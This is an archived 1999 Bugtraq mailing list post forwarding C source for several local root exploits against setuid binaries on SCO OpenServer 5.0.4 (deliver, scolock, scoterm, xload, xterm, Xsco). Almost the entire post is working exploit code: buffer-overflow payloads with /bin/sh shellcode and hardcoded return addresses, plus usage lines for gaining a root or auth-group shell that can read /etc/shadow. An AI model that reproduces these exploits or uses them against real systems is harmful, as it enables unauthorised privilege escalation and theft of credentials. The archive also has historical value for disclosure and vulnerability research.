Bugtraq mailing list archives
Re: sco suid binaries (fwd)
From: doble () INAME COM (doble)
Date: Fri, 3 Sep 1999 05:20:37 +0200
Hi: Well, there is no reason to keep this more time... ---------- Forwarded message ---------- Date: Fri, 3 Sep 1999 03:11:36 +0200 (CEST) From: doble <doble () iname com> To: Brock Tellier <btellier () webley com> Subject: Re: sco suid binaries [...] Try it, the ones that dont work are: -deliverx.c -xloadx.c -> the xserverx.c can only be run from console, but maybe there is a way to trick the system to run it from telnet or remotely... Take care... /* * <xserverx.c> Local root exploit * * Offset: deliver (SCO OpenServer 5.0.4) * * Usage: * $ cc deliverx.c -o deliverx * $ /usr/mmdf/bin/deliver -L`deliverx 0` * * By: The Dark Raver of CPNE (Murcia/Spain - 23/6/99) * * <http://members.tripod.com/~ochodedos> - <doble () iname com> * */ #include <stdlib.h> #include <stdio.h> char hell[]= "\xeb\x1b\x5e\x31\xdb\x89\x5e\x07\x89\x5e\x0c\x88\x5e\x11\x31\xc0" "\xb0\x3b\x8d\x7e\x07\x89\xf9\x53\x51\x56\x56\xeb\x10\xe8\xe0\xff" "\xff\xff/bin/sh\xaa\xaa\xaa\xaa\x9a\xaa\xaa\xaa\xaa\x07\xaa"; /* char hell[]= "\xeb\x1b" // start: jmp uno "\x5e" // dos: popl %esi "\x31\xdb" // xorl %ebx,%ebx "\x89\x5e\x07" // movb %bl,0x7(%esi) "\x89\x5e\x0c" // movl %ebx,0x0c(%esi) "\x88\x5e\x11" // movb %bl,0x11(%esi) "\x31\xc0" // xorl %eax,%eax "\xb0\x3b" // movb $0x3b,%al "\x8d\x7e\x07" // leal 0x07(%esi),%edi "\x89\xf9" // movl %edi,%ecx "\x53" // pushl %ebx "\x51" // pushl %ecx "\x56" // pushl %esi "\x56" // pushl %esi "\xeb\x10" // jmp execve "\xe8\xe0\xff\xff\xff" // uno: call dos "/bin/sh" "\xaa\xaa\xaa\xaa" "\x9a\xaa\xaa\xaa\xaa\x07\xaa"; // execve: lcall 0x7,0x0 */ #define OFF 0x8047c44 // SCO OpenServer 5.0.4 #define ALINEA 1 #define LEN 200 int main(int argc, char *argv[]) { int offset=0; char buf[LEN]; int i; if(argc < 2) { printf("Usage: deliverx <offset>\n"); exit(0); } else { offset=atoi(argv[1]); } memset(buf,0x90,LEN); memcpy(buf+50,hell,strlen(hell)); for(i=105+ALINEA;i<LEN-4;i+=4) *(int *)&buf[i]=OFF+offset; for(i=0;i<LEN;i++) putchar(buf[i]); exit(0); } * <scolockx.c> Local exploit - Gives you an auth group suid shell * * h0h0h0!! auth group has read/write access to /etc/shadow (w3 4r3 r00t!) * * $ ls -al /etc/shadow * -rw-rw---- 1 root auth 323 Jun 14 23:09 /etc/shadow * * Offset: scolockx (SCO OpenServer 5.0.4) * 0 -> with -display parameter * * Usage: * $ cc scolockx.c -o scolockx * $ /usr/bin/X11/scolock -display 1.1.1.1:0 -bg `scolockx 0` * * Note: scolock need to be run from a valid x-display * * By: The Dark Raver of CPNE (Murcia/Spain - 28/6/99) * * <http://members.tripod.com/~ochodedos> - <doble () iname com> * */ #include <stdlib.h> #include <stdio.h> char hell[]= "\xeb\x16" // start: jmp uno "\x5e" // dos: popl %esi "\x31\xdb" // xorl %ebx,%ebx "\x89\x5e\x07" // movb %bl,0x7(%esi) "\x89\x5e\x0c" // movl %ebx,0x0c(%esi) "\x88\x5e\x11" // movb %bl,0x11(%esi) "\x31\xc0" // xorl %eax,%eax "\xb0\x3b" // movb $0x3b,%al "\x53" // pushl %ebx "\x53" // pushl %ebx "\x56" // pushl %esi "\x56" // pushl %esi "\xeb\x10" // jmp execve "\xe8\xe5\xff\xff\xff" // uno: call dos "/bin/sh" "\xaa\xaa\xaa\xaa" "\x9a\xaa\xaa\xaa\xaa\x07\xaa"; // execve: lcall 0x7,0x0 #define OFF 0x8047a98 // SCO OpenServer 5.0.4 #define ALINEA 0 #define LEN 2000 int main(int argc, char *argv[]) { int offset=0; char buf[LEN]; int i; if(argc < 2) { printf("Usage: scolockx <offset>\n"); exit(0); } else { offset=atoi(argv[1]); } memset(buf,0x90,LEN); memcpy(buf+1000,hell,strlen(hell)); for(i=1100+ALINEA;i<LEN-4;i+=4) *(int *)&buf[i]=OFF+offset; for(i=0;i<LEN;i++) putchar(buf[i]); exit(0); } * <scotermx.c> Local root exploit * * Offset: scoterm (SCO OpenServer 5.0.4) * 0 -> From an open scoterm (without display parameter) * 2500 -> From remote telnet (with display parameter) * * Usage: * $ cc scotermx.c -o scotermx * $ scoterm * $ /usr/bin/X11/scoterm -geometry `scotermx 0` * or * $ /usr/bin/X11/scoterm -display 1.1.1.1:0 -geometry `scotermx 2500` * * Note: scoterm need to be run from a valid x-display * * By: The Dark Raver of CPNE (Murcia/Spain - 21/6/99) * * <http://members.tripod.com/~ochodedos> - <doble () iname com> * */ #include <stdlib.h> #include <stdio.h> char hell[]= "\xeb\x1b\x5e\x31\xdb\x89\x5e\x07\x89\x5e\x0c\x88\x5e\x11\x31\xc0" "\xb0\x3b\x8d\x7e\x07\x89\xf9\x53\x51\x56\x56\xeb\x10\xe8\xe0\xff" "\xff\xff/bin/sh\xaa\xaa\xaa\xaa\x9a\xaa\xaa\xaa\xaa\x07\xaa"; /* char hell[]= "\xeb\x1b" // start: jmp uno "\x5e" // dos: popl %esi "\x31\xdb" // xorl %ebx,%ebx "\x89\x5e\x07" // movb %bl,0x7(%esi) "\x89\x5e\x0c" // movl %ebx,0x0c(%esi) "\x88\x5e\x11" // movb %bl,0x11(%esi) "\x31\xc0" // xorl %eax,%eax "\xb0\x3b" // movb $0x3b,%al "\x8d\x7e\x07" // leal 0x07(%esi),%edi "\x89\xf9" // movl %edi,%ecx "\x53" // pushl %ebx "\x51" // pushl %ecx "\x56" // pushl %esi "\x56" // pushl %esi "\xeb\x10" // jmp execve "\xe8\xe0\xff\xff\xff" // uno: call dos "/bin/sh" "\xaa\xaa\xaa\xaa" "\x9a\xaa\xaa\xaa\xaa\x07\xaa"; // execve: lcall 0x7,0x0 */ #define OFF 0x80452ff // SCO OpenServer 5.0.4 #define ALINEA 1 #define LEN 2000 int main(int argc, char *argv[]) { int offset=0; char buf[LEN]; int i; if(argc < 2) { printf("Usage: scotermx <offset>\n"); exit(0); } else { offset=atoi(argv[1]); } memset(buf,0x90,LEN); memcpy(buf+1000,hell,strlen(hell)); for(i=1100+ALINEA;i<LEN-4;i+=4) *(int *)&buf[i]=OFF+offset; for(i=0;i<LEN;i++) putchar(buf[i]); exit(0); } * <st2.c> Local root exploit * * Offset: /usr/bin/X11/scoterm => Work only against patched binaries, * for default binaries use the old exploit. * -2000 -> Started from scoterm or xterm on localhost * 0 -> Started from remote telnet (with valid display parameter) * * Usage: * $ cc st2.c -o st2 * $ /usr/bin/X11/scoterm -display 1.1.1.1:0 -geometry `st2 0` * * By: The Dark Raver of CPNE (Spain - 5/8/99) * * <http://members.tripod.com/~ochodedos> - <doble () iname com> * */ #include <stdlib.h> #include <stdio.h> char hell[]= "\xeb\x1b\x5e\x31\xdb\x89\x5e\x07\x89\x5e\x0c\x88\x5e\x11\x31\xc0" "\xb0\x3b\x8d\x7e\x07\x89\xf9\x53\x51\x56\x56\xeb\x10\xe8\xe0\xff" "\xff\xff/bin/sh\xaa\xaa\xaa\xaa\x9a\xaa\xaa\xaa\xaa\x07\xaa"; /* char hell[]= "\xeb\x1b" // start: jmp uno "\x5e" // dos: popl %esi "\x31\xdb" // xorl %ebx,%ebx "\x89\x5e\x07" // movb %bl,0x7(%esi) "\x89\x5e\x0c" // movl %ebx,0x0c(%esi) "\x88\x5e\x11" // movb %bl,0x11(%esi) "\x31\xc0" // xorl %eax,%eax "\xb0\x3b" // movb $0x3b,%al "\x8d\x7e\x07" // leal 0x07(%esi),%edi "\x89\xf9" // movl %edi,%ecx "\x53" // pushl %ebx "\x51" // pushl %ecx "\x56" // pushl %esi "\x56" // pushl %esi "\xeb\x10" // jmp execve "\xe8\xe0\xff\xff\xff" // uno: call dos "/bin/sh" "\xaa\xaa\xaa\xaa" "\x9a\xaa\xaa\xaa\xaa\x07\xaa"; // execve: lcall 0x7,0x0 */ #define OFF 0x7fffeb80 // SCO OpenServer 5.0.4 #define ALINEA 2 #define LEN 1500 int main(int argc, char *argv[]) { int offset=0; char buf[LEN]; int i; if(argc < 2) { printf("Usage: st2 <offset>\n"); exit(0); } else { offset=atoi(argv[1]); } memset(buf,0x90,LEN); memcpy(buf+600,hell,strlen(hell)); for(i=700+ALINEA;i<LEN-4;i+=4) *(int *)&buf[i]=OFF+offset; for(i=0;i<LEN;i++) putchar(buf[i]); exit(0); } * <xloadx.c> Local root exploit * * Offset: xload (SCO OpenServer 5.0.4) * 0 -> From an open scoterm (without display parameter) * 2000 -> From remote telnet (with display parameter) * * Usage: * $ cc xloadx.c -o xloadx * $ scoterm * $ /usr/bin/X11/xload -geometry `xloadx 0` * or * $ /usr/bin/X11/xload -display 1.1.1.1:0 -geometry `xloadx 2000` * * Note: xload need to be run from a valid x-display * * By: The Dark Raver of CPNE (Murcia/Spain - 22/6/99) * * <http://members.tripod.com/~ochodedos> - <doble () iname com> * */ #include <stdlib.h> #include <stdio.h> char hell[]= "\xeb\x1b\x5e\x31\xdb\x89\x5e\x07\x89\x5e\x0c\x88\x5e\x11\x31\xc0" "\xb0\x3b\x8d\x7e\x07\x89\xf9\x53\x51\x56\x56\xeb\x10\xe8\xe0\xff" "\xff\xff/bin/sh\xaa\xaa\xaa\xaa\x9a\xaa\xaa\xaa\xaa\x07\xaa"; /* char hell[]= "\xeb\x1b" // start: jmp uno "\x5e" // dos: popl %esi "\x31\xdb" // xorl %ebx,%ebx "\x89\x5e\x07" // movb %bl,0x7(%esi) "\x89\x5e\x0c" // movl %ebx,0x0c(%esi) "\x88\x5e\x11" // movb %bl,0x11(%esi) "\x31\xc0" // xorl %eax,%eax "\xb0\x3b" // movb $0x3b,%al "\x8d\x7e\x07" // leal 0x07(%esi),%edi "\x89\xf9" // movl %edi,%ecx "\x53" // pushl %ebx "\x51" // pushl %ecx "\x56" // pushl %esi "\x56" // pushl %esi "\xeb\x10" // jmp execve "\xe8\xe0\xff\xff\xff" // uno: call dos "/bin/sh" "\xaa\xaa\xaa\xaa" "\x9a\xaa\xaa\xaa\xaa\x07\xaa"; // execve: lcall 0x7,0x0 */ #define OFF 0x80462ff // SCO OpenServer 5.0.4 #define ALINEA 3 #define LEN 2000 int main(int argc, char *argv[]) { int offset=0; char buf[LEN]; int i; if(argc < 2) { printf("Usage: xloadx <offset>\n"); exit(0); } else { offset=atoi(argv[1]); } memset(buf,0x90,LEN); memcpy(buf+1000,hell,strlen(hell)); for(i=1100+ALINEA;i<LEN-4;i+=4) *(int *)&buf[i]=OFF+offset; for(i=0;i<LEN;i++) putchar(buf[i]); exit(0); } * <xtermx.c> Local root exploit * * Offset: xterm (SCO OpenServer 5.0.4) * 0 -> From an open scoterm (without display parameter) * 0 -> Openserver 5.0.2 (with display parameter) * 2000 -> From remote telnet (with display parameter) * * Usage: * $ cc xtermx.c -o xtermx * $ scoterm * $ /usr/bin/X11/xterm -bg `xtermx 0` * or * $ /usr/bin/X11/xterm -display 1.1.1.1:0 -bg `xtermx 2000` * * Note: xterm need to be run from a valid x-display * * By: The Dark Raver of CPNE (Murcia/Spain - 22/6/99) * * <http://members.tripod.com/~ochodedos> - <doble () iname com> * */ #include <stdlib.h> #include <stdio.h> char hell[]= "\xeb\x1b\x5e\x31\xdb\x89\x5e\x07\x89\x5e\x0c\x88\x5e\x11\x31\xc0" "\xb0\x3b\x8d\x7e\x07\x89\xf9\x53\x51\x56\x56\xeb\x10\xe8\xe0\xff" "\xff\xff/bin/sh\xaa\xaa\xaa\xaa\x9a\xaa\xaa\xaa\xaa\x07\xaa"; /* char hell[]= "\xeb\x1b" // start: jmp uno "\x5e" // dos: popl %esi "\x31\xdb" // xorl %ebx,%ebx "\x89\x5e\x07" // movb %bl,0x7(%esi) "\x89\x5e\x0c" // movl %ebx,0x0c(%esi) "\x88\x5e\x11" // movb %bl,0x11(%esi) "\x31\xc0" // xorl %eax,%eax "\xb0\x3b" // movb $0x3b,%al "\x8d\x7e\x07" // leal 0x07(%esi),%edi "\x89\xf9" // movl %edi,%ecx "\x53" // pushl %ebx "\x51" // pushl %ecx "\x56" // pushl %esi "\x56" // pushl %esi "\xeb\x10" // jmp execve "\xe8\xe0\xff\xff\xff" // uno: call dos "/bin/sh" "\xaa\xaa\xaa\xaa" "\x9a\xaa\xaa\xaa\xaa\x07\xaa"; // execve: lcall 0x7,0x0 */ #define OFF 0x80471ff // SCO OpenServer 5.0.4 #define ALINEA 0 #define LEN 2000 int main(int argc, char *argv[]) { int offset=0; char buf[LEN]; int i; if(argc < 2) { printf("Usage: xtermx <offset>\n"); exit(0); } else { offset=atoi(argv[1]); } memset(buf,0x90,LEN); memcpy(buf+1000,hell,strlen(hell)); for(i=1100+ALINEA;i<LEN-4;i+=4) *(int *)&buf[i]=OFF+offset; for(i=0;i<LEN;i++) putchar(buf[i]); exit(0); } * <xserverx.c> Local root exploit * * Offset: Xsco (SCO OpenServer 5.0.4) * 0 -> from gdb * 50 - 100 -> from shell * * Usage: * $ cc xserverx.c -o xserverx * $ /usr/bin/X11/Xsco :`xserverx 80` * * By: The Dark Raver of CPNE (Murcia/Spain - 23/6/99) * * <http://members.tripod.com/~ochodedos> - <doble () iname com> * */ #include <stdlib.h> #include <stdio.h> char hell[]= "\xeb\x1b\x5e\x31\xdb\x89\x5e\x07\x89\x5e\x0c\x88\x5e\x11\x31\xc0" "\xb0\x3b\x8d\x7e\x07\x89\xf9\x53\x51\x56\x56\xeb\x10\xe8\xe0\xff" "\xff\xff/bin/sh\xaa\xaa\xaa\xaa\x9a\xaa\xaa\xaa\xaa\x07\xaa"; /* char hell[]= "\xeb\x1b" // start: jmp uno "\x5e" // dos: popl %esi "\x31\xdb" // xorl %ebx,%ebx "\x89\x5e\x07" // movb %bl,0x7(%esi) "\x89\x5e\x0c" // movl %ebx,0x0c(%esi) "\x88\x5e\x11" // movb %bl,0x11(%esi) "\x31\xc0" // xorl %eax,%eax "\xb0\x3b" // movb $0x3b,%al "\x8d\x7e\x07" // leal 0x07(%esi),%edi "\x89\xf9" // movl %edi,%ecx "\x53" // pushl %ebx "\x51" // pushl %ecx "\x56" // pushl %esi "\x56" // pushl %esi "\xeb\x10" // jmp execve "\xe8\xe0\xff\xff\xff" // uno: call dos "/bin/sh" "\xaa\xaa\xaa\xaa" "\x9a\xaa\xaa\xaa\xaa\x07\xaa"; // execve: lcall 0x7,0x0 */ #define OFF 0x80478ff // SCO OpenServer 5.0.4 #define ALINEA 2 #define LEN 200 int main(int argc, char *argv[]) { int offset=0; char buf[LEN]; int i; if(argc < 2) { printf("Usage: xserverx <offset>\n"); exit(0); } else { offset=atoi(argv[1]); } memset(buf,0x90,LEN); memcpy(buf+80,hell,strlen(hell)); for(i=140+ALINEA;i<LEN-4;i+=4) *(int *)&buf[i]=OFF+offset; for(i=0;i<LEN;i++) putchar(buf[i]); exit(0); }
Current thread:
- Re: sco suid binaries (fwd) doble (Sep 02)